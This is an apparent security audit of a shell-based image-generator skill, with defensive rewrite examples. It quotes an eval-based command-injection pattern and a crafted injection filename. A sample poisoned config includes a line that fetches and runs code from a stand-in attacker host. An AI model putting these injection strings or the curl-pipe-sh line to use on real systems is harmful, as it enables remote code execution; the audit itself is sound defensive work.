Pollinations Image Generator
Verdict: Warn
Audited by ClawScan on May 10, 2026.
Overview
The skill mostly matches its image-generation purpose, but its shell script builds a curl command string from user-supplied options and runs it with eval, sources a preference file as shell code, and can expose API keys.
Install only after the script is fixed to remove eval, parse config files safely, mask API keys, and correct the helper-file layout. If you use it, avoid sensitive prompt text and be aware that paid models may consume Pollinations credits.
Findings (5)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
A crafted filename or option passed through the agent could run local shell commands instead of only downloading an image.
User-controlled values such as filename, dimensions, seed, and output directory are incorporated into a shell command string that is run with eval. Embedded quotes or shell metacharacters could break quoting and execute local commands.
-f|--filename) shift; filename=$1 ;;
...
output_path="$OUTPUT_DIR/$(basename "$filename")"
...
curl_cmd="curl -sS -L -o \"$output_path\" --max-time 120"
...
if ! eval "$curl_cmd"; then
Remove eval and call curl with directly quoted arguments; strictly validate numeric fields and seeds; restrict filenames to safe characters before use.
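The fix this finding recommends, as an added example that is not the skill's own generate.sh: the eval-based string is returned as text so the broken quoting is visible, and the download function validates each field and hands it to curl as a separate argument. BASE_URL is taken from the page; OUTPUT_DIR, the CURL override, the dimension and seed bounds, the filename character set and the percent-encoder are assumptions for this example.

```shell
#!/bin/sh
# Added example, not the skill's own generate.sh: the eval-based command string
# from the finding beside an argument-list version with input validation.
# BASE_URL is the page's; OUTPUT_DIR, the CURL override, the dimension bounds
# and the filename character set are assumptions for this example.
export LC_ALL=C
BASE_URL="https://gen.pollinations.ai"
OUTPUT_DIR="${OUTPUT_DIR:-/tmp/pollinations-out}"
CURL="${CURL:-curl}"   # overridable so the function can be exercised offline

# Vulnerable pattern from the finding: the filename lands inside a string that
# generate.sh later hands to eval. Returned as text, not executed, so the broken
# quoting is visible: a filename of  x"; id #  closes the -o argument early.
unsafe_curl_string() {
  output_path="$OUTPUT_DIR/$(basename "$1")"
  printf '%s' "curl -sS -L -o \"$output_path\" --max-time 120"
}

# Allowlist checks. POSIX case patterns; [!...] negates the class.
is_safe_filename() {
  case "$1" in
    ''|.*|*[!A-Za-z0-9._-]*) return 1 ;;   # no empty, hidden or odd-character names
  esac
}
is_uint() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
}
is_dimension() { is_uint "$1" && [ "$1" -ge 64 ] && [ "$1" -le 2048 ]; }
is_seed()      { is_uint "$1" && [ "${#1}" -le 10 ]; }   # bounded length keeps test(1) happy

# Percent-encode the prompt for the URL path (RFC 3986 unreserved bytes pass through).
urlencode() {
  printf '%s' "$1" | od -An -v -tx1 | tr -s ' ' '\n' | while read -r hex; do
    [ -n "$hex" ] || continue
    c=$(printf "\\$(printf '%03o' "0x$hex")")
    case "$c" in
      [A-Za-z0-9._~-]) printf '%s' "$c" ;;
      *) printf '%%%s' "$(printf '%s' "$hex" | tr 'a-f' 'A-F')" ;;
    esac
  done
}

# Fixed version: validated values are passed to curl as separate arguments, so
# quotes and metacharacters in them can never become shell syntax.
download_image() {
  prompt=$1 width=$2 height=$3 seed=$4 filename=$5
  is_safe_filename "$filename" || { echo "rejected filename: $filename" >&2; return 2; }
  is_dimension "$width" && is_dimension "$height" || { echo "rejected dimensions" >&2; return 2; }
  is_seed "$seed" || { echo "rejected seed" >&2; return 2; }
  url="$BASE_URL/image/$(urlencode "$prompt")?width=$width&height=$height&seed=$seed"
  mkdir -p "$OUTPUT_DIR"
  "$CURL" -sS -L -o "$OUTPUT_DIR/$filename" --max-time 120 "$url"
}

# Demonstration with the crafted filename (no network: this call is rejected).
crafted='x"; id #'
printf 'eval string: %s\n' "$(unsafe_curl_string "$crafted")"
download_image "a red fox" 512 512 42 "$crafted" || echo "blocked with status $?"
```

Passing `"$url"` and `"$OUTPUT_DIR/$filename"` as argv entries is what removes the injection: the shell never re-parses them, so validation only has to guard against path traversal and oversized or non-numeric values, not against quoting tricks.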
A file that appears to be simple configuration could execute commands in future sessions.
.user.conf is documented as a preference file, but the script sources it as shell code. If that persistent file is modified or poisoned, commands inside it run whenever the skill runs.
USER_CONF="$SCRIPT_DIR/.user.conf"
[ -f "$USER_CONF" ] && . "$USER_CONF"
Parse .user.conf as key/value data instead of sourcing it, and validate allowed keys and values.
An unrelated project API key could be picked up, and a Pollinations API key could appear in the agent transcript or logs.
The skill loads .env files from the parent directory and the current working directory rather than only a clearly scoped skill-local file, so an unrelated project's secrets can be read into the process. ClawScan also reports that the config command prints the actual API key when set; the excerpt below only reports configured/not set, so check every place the config command echoes API_KEY before relying on that status line.
load_env_file "$SCRIPT_DIR/../.env"
load_env_file "$PWD/.env"
API_KEY=${POLLINATIONS_API_KEY:-}
...
echo "API Key: ${API_KEY:+✅ configured}${API_KEY:-❌ not set}"
Load only a clearly documented skill-local credential file or declared environment variable, and mask secrets in all output.
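One way to handle both the .user.conf finding above and this .env finding, as an added example that is not the skill's code: a key=value reader that never sources the file, restricted to a declared file and declared keys, plus a masked status line. The allowed keys, the value character set, the sample file contents (including the attacker.invalid URL and /tmp/pwned marker) are constructed assumptions for this example.

```shell
#!/bin/sh
# Added example, not the skill's own code: read .user.conf and a skill-local
# .env as key=value data instead of sourcing them, and mask the key in status
# output. The allowed keys, the value character set and the sample file
# contents are assumptions constructed for this example.
export LC_ALL=C

# key=value reader. Nothing here is evaluated as shell, so "$(...)", backticks,
# ';' and similar in a poisoned line stay inert. Accepted entries are printed
# as "KEY VALUE"; anything else is reported on stderr and skipped.
read_kv_file() {
  file=$1; shift                       # remaining arguments: allowed keys
  [ -f "$file" ] || return 0
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in ''|'#'*) continue ;; esac
    key=${line%%=*}; value=${line#*=}
    case "$key" in
      ''|*[!A-Z0-9_]*) echo "skip: malformed line in $file" >&2; continue ;;
    esac
    allowed=0
    for k in "$@"; do [ "$k" = "$key" ] && allowed=1; done
    [ "$allowed" -eq 1 ] || { echo "skip: key $key not allowed" >&2; continue; }
    case "$value" in                  # no whitespace, quotes or shell metacharacters
      ''|*[!A-Za-z0-9._:/@-]*) echo "skip: unsafe value for $key" >&2; continue ;;
    esac
    printf '%s %s\n' "$key" "$value"
  done < "$file"
}

# Value of one allowed key, empty when absent or rejected (last definition wins).
kv_get() {
  read_kv_file "$1" "$2" 2>/dev/null |
    awk -v k="$2" '$1 == k { v = $2 } END { printf "%s", v }'
}

# Status output never echoes the secret itself: presence plus the last four characters.
mask_secret() {
  s=$1
  [ -n "$s" ] || { printf 'not set'; return 0; }
  if [ "${#s}" -gt 4 ]; then printf '****%s' "${s#"${s%????}"}"; else printf '****'; fi
}

# Constructed sample files: a poisoned preference file and a skill-local .env.
write_sample_files() {
  cat > "$1/.user.conf" <<'EOF'
# preferences
DEFAULT_MODEL=flux
DEFAULT_WIDTH=1024
DEFAULT_HEIGHT=$(curl -s http://attacker.invalid/p | sh)
$(id > /tmp/pwned)
EOF
  cat > "$1/.env" <<'EOF'
POLLINATIONS_API_KEY=pk_example_0000abcd
OTHER_PROJECT_SECRET=do-not-read-me
EOF
}

SKILL_DIR=${SKILL_DIR:-$(mktemp -d)}
write_sample_files "$SKILL_DIR"
DEFAULT_MODEL=$(kv_get "$SKILL_DIR/.user.conf" DEFAULT_MODEL)
DEFAULT_WIDTH=$(kv_get "$SKILL_DIR/.user.conf" DEFAULT_WIDTH)
DEFAULT_HEIGHT=$(kv_get "$SKILL_DIR/.user.conf" DEFAULT_HEIGHT)   # rejected, stays empty
# Only the skill-local .env and only the declared key; an exported variable still wins.
API_KEY=${POLLINATIONS_API_KEY:-$(kv_get "$SKILL_DIR/.env" POLLINATIONS_API_KEY)}
echo "model=$DEFAULT_MODEL width=$DEFAULT_WIDTH height='$DEFAULT_HEIGHT'"
echo "API Key: $(mask_secret "$API_KEY")"
```

Sourcing the same .user.conf would have run both injected lines on every invocation; the reader above turns them into two skipped entries on stderr and never touches OTHER_PROJECT_SECRET because that key was never declared.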
The skill may fail to run unless the files are rearranged correctly.
The script expects lib/models.sh, while the supplied file manifest provides models.sh at the root. This looks like a packaging/layout mismatch rather than malicious behavior.
LIB_DIR="$SCRIPT_DIR/lib"
# Load model registry
. "$LIB_DIR/models.sh"
Package the helper at lib/models.sh or update generate.sh and SKILL.md to match the actual file layout.
Anything included in the prompt is shared with the external provider.
The skill sends the user’s prompt and generation settings to the Pollinations.ai image-generation endpoint, which is expected for this integration.
BASE_URL="https://gen.pollinations.ai"
...
api_url="${BASE_URL}/image/${encoded_prompt}?width=${width}&height=${height}&model=${model}"
Avoid putting private secrets or sensitive personal information in image prompts, and review the provider’s data handling policies.
